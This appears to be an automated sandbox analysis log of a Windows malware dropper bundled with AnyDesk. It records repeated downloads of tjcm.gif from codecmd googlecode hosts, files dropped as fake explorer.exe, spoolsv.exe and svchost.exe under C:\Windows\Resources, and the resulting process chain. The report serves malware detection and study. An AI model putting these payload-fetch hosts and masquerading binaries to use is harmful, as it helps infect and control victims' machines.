                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/wol
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://my.anydesk.com
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://my.anydesk.com/password-generator.
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.anydesk.coms
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://order.anydesk.com/trial
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://policies.google.com/privacy?hl=$
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/privacy?hl=en
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/privacy?hl=en$
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/privacy?hl=enf
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://support.anydesk.com/
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/.
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://support.anydesk.com/AnyDesk_on_macOS
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/f
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://twitter.com/home?status=Do%20you%20know%20%23AnyDesk?%20AnyDesk%20is%20a%20small%20and%20qui
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.google.com/intl/$
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.linkedin.com/shareArticle?mini=true&url=https%3A//anydesk.com/&title=Try%20AnyDesk%20Rem
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.nayuki.io/page/qr-code-generator-library
                                Source: unknownDNS traffic detected: queries for: boot.net.anydesk.com
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: unknownHTTPS traffic detected: 185.229.191.39:443 -> 192.168.2.5:49768 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 49.12.130.236:443 -> 192.168.2.5:49807 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 49.12.130.236:443 -> 192.168.2.5:49856 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 49.12.130.237:443 -> 192.168.2.5:49889 version: TLS 1.2
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DirectDrawCreateEx

                                System Summary

                                barindex
                                PE file has a writeable .text section
                                Source: sJ9Q8UWMAX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: icsys.icn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: explorer.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: spoolsv.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: svchost.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: sJ9Q8UWMAX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeFile deleted: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeCode function: 0_2_00412C100_2_00412C10
                                Source: sj9q8uwmax.exe .0.drStatic PE information: No import functions for PE file found
                                Source: sJ9Q8UWMAX.exe, 00000000.00000000.435360088.000000000041D000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs sJ9Q8UWMAX.exe
                                Source: sj9q8uwmax.exe .0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: sj9q8uwmax.exe .0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: tokenbinding.dllJump to behavior
                                Source: sJ9Q8UWMAX.exeVirustotal: Detection: 86%
                                Source: sJ9Q8UWMAX.exeMetadefender: Detection: 85%
                                Source: sJ9Q8UWMAX.exeReversingLabs: Detection: 100%
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile read: C:\Users\user\Desktop\sJ9Q8UWMAX.exeJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\svchost.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                                Source: C:\Windows\Resources\svchost.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                                Source: unknownProcess created: C:\Users\user\Desktop\sJ9Q8UWMAX.exe "C:\Users\user\Desktop\sJ9Q8UWMAX.exe"
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess created: C:\Users\user\Desktop\sj9q8uwmax.exe c:\users\user\desktop\sj9q8uwmax.exe
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exe
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process created: C:\Users\user\Desktop\sj9q8uwmax.exe "c:\users\user\desktop\sj9q8uwmax.exe " --local-service
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exe
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process created: C:\Users\user\Desktop\sj9q8uwmax.exe "c:\users\user\desktop\sj9q8uwmax.exe " --local-control
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SE
                                Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exe
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PR
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                                Source: unknownProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess created: C:\Users\user\Desktop\sj9q8uwmax.exe c:\users\user\desktop\sj9q8uwmax.exe Jump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process created: C:\Users\user\Desktop\sj9q8uwmax.exe "c:\users\user\desktop\sj9q8uwmax.exe " --local-serviceJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process created: C:\Users\user\Desktop\sj9q8uwmax.exe "c:\users\user\desktop\sj9q8uwmax.exe " --local-controlJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exeJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SEJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exeJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PRJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2155fee3-2419-4373-b102-6843707eb41f}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM Win32_Processor
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: c:\users\user\desktop\sj9q8uwmax.exe Jump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: C:\Users\user\AppData\Local\Temp\~DFFE57A1C8066DBB5E.TMPJump to behavior
                                Source: classification engineClassification label: mal100.spre.evad.winEXE@22/19@15/7
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe File read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeCode function: 0_2_00410180 __vbaChkstk,__vbaStrCopy,__vbaAryConstruct2,__vbaOnError,CreateToolhelp32Snapshot,__vbaSetSystemError,__vbaRecUniToAnsi,Process32First,__vbaSetSystemError,__vbaRecAnsiToUni,#525,__vbaStrMove,__vbaSetSystemError,__vbaGenerateBoundsError,__vbaStrToAnsi,K32GetModuleFileNameExA,__vbaSetSystemError,__vbaStrToUnicode,__vbaFreeStr,#616,__vbaStrMove,__vbaStrMove,__vbaFreeStr,__vbaLenBstr,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaInStr,__vbaFreeStrList,__vbaRecUniToAnsi,Process32Next,__vbaSetSystemError,__vbaRecAnsiToUni,FindCloseChangeNotification,__vbaFreeStr,__vbaAryDestruct,__vbaFreeStr,__vbaFreeStr,0_2_00410180
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Session\1\ad_connect_queue_7024_1677787656_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_6912_1582247049_0_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2884_1748695018_1_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_6912_1582247049_1_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_708_lsystem_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2884_1748695018_0_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_trace_mtx
                                Source: sJ9Q8UWMAX.exe, sJ9Q8UWMAX.exe, 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, sJ9Q8UWMAX.exe, 00000000.00000000.435290439.0000000000401000.00000080.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000002.00000002.490867469.0000000000402000.00000080.00000001.01000000.00000007.sdmp, icsys.icn.exe, 00000002.00000000.456086983.0000000000401000.00000080.00000001.01000000.00000007.sdmpBinary or memory string: A*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                                Source: sJ9Q8UWMAX.exe, 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000002.00000002.490945123.000000000041B000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: flH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                                Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe File read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe File read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
